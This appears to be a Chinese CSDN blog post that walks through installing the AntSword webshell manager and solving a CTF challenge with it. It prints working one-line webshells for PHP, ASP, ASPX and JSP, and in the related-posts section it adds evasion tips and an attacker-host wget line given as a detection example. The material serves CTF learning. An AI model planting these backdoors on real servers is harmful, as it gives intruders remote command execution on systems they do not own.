【蚁剑的安装与使用+例题实战】【CTF】webshell

已于 2022-01-20 11:04:13 修改
阅读量4k 收藏 5
点赞数 3
分类专栏: 渗透测试 文章标签: 安全 web安全 渗透测试 CTF
于 2022-01-20 11:03:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41691212/article/details/122596204
版权

目录

蚁剑(AntSword)是什么?

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

获取蚁剑

环境:win10

文件:如下图所示(第一个是蚁剑的加载器,第二个是蚁剑的源码,二者缺一不可)
在这里插入图片描述

蚁剑下载器

下载器获取地址:https://github.com/AntSwordProject/AntSword-Loader

根据你的环境下载对应的安装包。
在这里插入图片描述

蚁剑源码

点击下载蚁剑源码

(源码与环境无关,大家可以直接下载)

安装

把两个包放在一个文件夹下(也可以不放在一起),然后解压缩。

1、打开加载器,找到AntSword.exe文件,双击它。
在这里插入图片描述
2、点击初始化,文件路径选择antSword-master文件下,因为里面有源码。如果选择一个空目录作为蚁剑的工作目录,加载器会自动下载源代码,但是可能会报错。
在这里插入图片描述在这里插入图片描述

3、待提示初始化完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面。
在这里插入图片描述

可能遇到的问题

Q: 下载或者解压出错

A: 遇到这种问题,按照下面步骤手动进行:

  1. 手动 clone antsword 源代码, 或者直接点这里下载源代码并解压
$ git clone https://github.com/AntSwordProject/AntSword.git
  1. 打开加载器,选择源代码所在目录(简单理解为 app.js 所在目录)。

例如app.js路径为:D:\test\antsword\app.js,那么选择的目录主是 D:\test\antsword\

特别提醒,不要中文路径

Q: Kali Linux 下 Segmentation fault

A: 参考 AntSword-Loader #3

题目

小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。
在这里插入图片描述

题意

点击连接,打开页面,第一眼看见

你会使用webshell吗?
<?php @eval($_POST['shell']);?>

什么是webshell?

以下内容源于以下博客

https://blog.csdn.net/qq_36119192/article/details/84563791

webshell是黑客行话里面的“大马”,一句话木马是“小马”。

webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。

因为上面所介绍webshell概念中提到的大马在现阶段的安全领域中已经被盯的非常紧了,而且各种杀毒软件和防火墙软件都对这种“大马”有了甄别能力,所以如果被渗透的web服务器中安装了防御软件的话,留下这种大马作为自己的webshell就非常困难了,于是一种新型的webshell就横空出世了,那就是一句话木马。

简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。对于不同的语言有不同的构造方法,基本构造是首先出现的是脚本开始的标记,后边跟着的 eval 或者是 execute 是核心部分,就是获取并执行后边得到的内容,而后边得到的内容,是 request 或者是 $_POST 获取的值。如果我们通过客户端向服务器发送,那么就会让服务器执行我们发送的脚本,挂马就实现了。

一些不同脚本语言的一句话木马

php一句话木马:  <?php @eval($_POST[value]); ?>
asp一句话木马:  <%eval request ("value")%><% execute(request("value")) %>   
aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 
<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中

在这里插入图片描述

题解

1、打开蚁剑(双击AntSword.exe),在空白位置单击「鼠标右键」,弹出菜单,选择 「添加数据」,在URL地址输入地址,连接密码输入「shell」,点击「添加」即可。
在这里插入图片描述
在这里插入图片描述
2、双击这条数据,在html下双击flag.txt文件,即可得到flag。
在这里插入图片描述
在这里插入图片描述

流量分析-Wireshark -操作手册(不能说最全,只能说更全)
路baby的博客
03-22 2万+
流量分析-Wireshark -操作手册(不能说最全,只能说更全) 基于各种比赛做的总解 基于协议过滤⼿法👍 常用筛选命令方法 常⽤快捷键👍 数据包筛选 顶峰相见
webshell一句话木马
2ed
06-23 3262
webshell 可理解为web+shell 通常就是大佬所说的大马 web就是指web页面,shell就是命令执行环境。webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来...
webshell、木马后门之间的区别
July_2th的博客
11-22 8578
  webshellweb入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 为了更好理解webshell我们学习两...
中国初始化问题
hp.puppy的博客
03-24 172
在一些集成工具里常常会遇到作者已经帮我们整理好的工具,但我们下载本地使用时通常会让我们再次进行初始化。只需初始化时 目录选择至集成工具作者大大给初始化好的文件位置就可以啦。防止遇到 代码解压出错:[object object右键点击应用启动程序,以管理员身份运行。首先打开程序所在目录
安装
CC_FL的博客
02-21 321
核心 GitHub - AntSwordProject/antSword: 中国是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit.https://github.com/AntSwordProject/antSword 安装器 GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器https://github.com/AntSwordProject/An
webshell及木马详解
金色%夕阳的博客
04-24 6056
webshell简介 什么是webshell ,一句话木马是什么样的 <?php @eval($_POST[cmd]);?> 怎么对木马进行免杀(绕过) 异或变形,关键字拼接,加密,编码等方式 文件上传 文件上传有哪些可以利用的点 前端校验 js 禁用js 或者 burp抓包后改名将.jpg改为.php 后端校验MIME类型。 更改Content-Type为Content-Type: image/jpeg 文件后缀黑名单 寻找其他可解析后缀 利用.user.ini .htaccess 利用%
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
SSRF漏洞浅析+ctfhub简单实战
热门推荐
wo41ge的博客
03-27 2万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到自身相连而外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
ctf近期学习大总结(一)
weixin_43342135的博客
09-06 1877
经过上次的自闭赛之后,明白了总结的重要性+实战+刷题+看书+基础 ctf中一定要学会python,不然拿到题目,知道思路,就是写不出flag,那就很是尴尬了 由于接触到的赛题太少了,这里就有点low了,望各路大佬请多指教。 ctf是一门综合的比赛 关于web方面: 对于简单题: 终究其本质就是在 利用 web的基础知识 出题,比如说让你 利用 burpsuite 修改 访问的ip ,再比...
文件包含漏洞习题攻防世界
04-03
#### 二、CTF例题实战 1. **攻防世界(XCTF例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http ...
红队专题-漏洞挖掘-代码审计-反序列化
最新发布
aming小老弟
04-21 1868
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
4.0.3安装包,附带安装教程
06-01
4.0.3安装包,附带安装教程
安装(2023.1.11)
qq_42605416的博客
01-11 621
安装教程
一句话木马:JSP篇
09-21 9159
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
渗透测试 - jsp一句话大马小马 &&冰蝎(2025/3/13更新)
浩策盾悟
12-23 1万+
【代码】渗透测试 - webshell jsp一句话小马 && 连接。
中国安装
Jiajiajiang_的博客
08-06 5755
首先下载源码和加载器 源码:https://github.com/AntSwordProject/antSword 加载器:https://github.com/AntSwordProject/AntSword-Loader 选择合适版本的加载器进行下载。我这里是win64。 下好的两个文件都进行解压。 打开加载器的文件夹。 选择AntSword.exe,双击,需要先初始化。 ...
JSP webshell免杀——webshell免杀
weixin_46601374的博客
06-29 3845
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习免杀首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
中国安装(附文件)
qq_74263993的博客
07-12 754
链接:https://pan.baidu.com/s/1bhBe6a1_5VFYUY35XG1N9Q?pwd=x9gp 提取码:x9gp。链接:https://pan.baidu.com/s/1u8CMkOORRVpCI2zJysJPQQ?pwd=x9gp 提取码:x9gp。我先挂几个月,后续怕找不到的话,就自己保存网盘。如果自己会魔法,也可以去官网下载我那两个文件。挂上魔法,初始化也能让它自己下载。
ctfwebshell
03-09
<think>好的,我现在需要处理用户关于CTF竞赛中WebShell使用教程检测方法的查询。首先,用户提供的引用内容涉及WebShell的基础知识、免杀方法、CMS漏洞利用、文件上传漏洞以及通过其他方式植入WebShell的途径。我需要综合这些信息,按照用户的要求结构清晰、分步骤解答,并生成相关问题。 首先,用户的问题分为两部分:使用教程和检测方法。我需要分别处理这两个部分。使用教程应包括WebShell的基本概念、常见类型、使用方法(如连接)、免杀技巧以及获取WebShell的途径。检测方法则需要涵盖日志分析、文件监控、行为检测、流量分析、WAF规则和沙箱检测等。 在引用内容中,用户提到了利用公开漏洞获取WebShell(如PHPCMS的例子)、文件上传漏洞植入WebShell,以及通过配置连接的方法。这些都需要整合到教程部分。同时,检测方法部分需要结合引用提到的文件上传漏洞利用后的检测,以及流量分析和日志检查。 需要确保回答中使用正确的LaTeX格式,所有行内数学表达式用$...$,独立公式用$$...$$,但当前内容可能涉及较少的数学公式,可能需要检查是否有必要使用。例如,在讲解加密或编码时可能会有Base64的示例,可以用行内代码块而非数学公式。 另外,用户要求生成相关问题,需要根据内容提出三个相关问题,例如WebShell的隐藏方法、检测工具、免杀技术演进等。 需要确保回答符合系统级指令,特别是正确的中文回答和引用标注。引用[1]、[2]、[3]分别在适当的位置添加,例如在公开漏洞途径、文件上传漏洞和连接部分。 现在开始组织内容: 1. WebShell使用教程: - 定义和作用:根据引用[2],WebShell是攻击者留下的后门,用于后续操作。 - 常见类型:一句话木马(如PHP的eval($_POST['cmd'])),引用[3]中的例子。 - 使用方法:配置步骤,引用[3]中的步骤。 - 免杀技巧:编码加密、混淆、隐藏路径,引用[1]中的免杀基础。 - 获取途径:公开漏洞(引用[1]的PHPCMS例子)、文件上传(引用[2])、其他方式如数据库插入(引用[2])。 2. 检测方法: - 日志分析:检查异常访问,引用[2]中的文件上传漏洞利用后的日志。 - 文件监控:查找异常文件,如引用[3]中的www目录下的木马。 - 行为检测:执行命令的行为,引用[2]中的webshell后续操作。 - 流量分析:加密流量特征,引用[2]中的webshell通信。 - WAF规则:拦截可疑请求,引用[1]中的修复漏洞建议。 - 沙箱检测:动态分析,引用可能未直接提到,但属于常见方法。 生成的相关问题需要围绕使用和检测,例如隐藏方法、工具推荐、免杀技术等。 需要检查是否所有引用都被正确使用,并且标注在相应位置。例如,在提到公开漏洞时添加[^1],文件上传漏洞添加[^2],连接添加[^3]。 最后,确保结构清晰,分点回答,代码块正确使用,引用标注自然。</think>### CTF竞赛中WebShell使用教程检测方法 #### 一、WebShell基础使用教程 1. **WebShell定义作用** WebShell是一种通过Web脚本语言(如PHP、ASP)编写的恶意程序,通常作为攻击者控制服务器的后门。例如PHP一句话木马: ```php <?php @eval($_POST['cmd']); ?> ``` 攻击者可通过此木马执行任意系统命令或上传文件。 2. **常见WebShell类型** - **一句话木马**:如`<?php system($_GET['cmd']); ?>`,常用于快速连接工具(如)。 - **加密木马**:通过Base64或异或运算隐藏代码,例如: ```php <?php eval(base64_decode("ZGllKGZpbGVfZ2V0X2NvbnRlbnRzKCdwaHAnKSk7")); ?> ``` - **图片马**:将WebShell嵌入图片的EXIF信息中,绕过基础检测。 3. **WebShell使用方法(以为例)** - **步骤1**:将木马上传到目标服务器(如通过文件上传漏洞)。 - **步骤2**:配置连接参数,填写木马URL和密码: ```python # 示例:连接配置 URL: http://target.com/shell.php 密码: cmd # 对应$_POST['cmd'] ``` - **步骤3**:通过图形化界面执行命令、浏览文件或提权。 4. **免杀技巧** - **代码混淆**:使用函数动态拼接关键字,如`$a = "ev"."al"; $a($_GET['c']);`。 - **加密通信**:采用AES加密传输内容,避免流量特征被识别[^1]。 - **隐藏路径**:将WebShell文件命名为`index.php.bak`,利用服务器解析漏洞[^1]。 5. **WebShell获取途径** - **公开漏洞利用**:如PHPCMS历史漏洞可直接上传木马。 - **文件上传漏洞**:绕过类型检测(如修改Content-Type为`image/png`)。 - **数据库写入**:通过SQL注入将木马插入表字段,再导出为PHP文件。 --- #### 二、WebShell检测方法 1. **日志分析** 检查Web日志中异常请求,如频繁访问`/admin/shell.php?cmd=whoami`,或POST数据包含`eval`关键字。 2. **文件监控** - **哈希对比**:定期计算系统文件的MD5值,发现未知修改。 - **敏感函数扫描**:使用工具搜索文件中`eval`、`system`、`shell_exec`等危险函数。 3. **行为检测** - **进程监控**:检测异常进程(如`/bin/sh -c "wget http://attacker.com/payload"`)。 - **权限审计**:Web用户(如www-data)突然拥有root权限。 4. **流量分析** 识别加密流量中的固定特征,例如默认的UA头`AntSword/v2.1`,或固定心跳包间隔。 5. **WAF规则** 配置正则规则拦截可疑请求,如: ```nginx if ($query_string ~* "(eval\(|base64_decode)") { return 403; } ``` 6. **沙箱动态检测** 上传文件至沙箱环境,观察是否尝试连接外部IP或修改系统关键文件[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

粥粥粥少女的拧发条鸟

你的鼓励是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值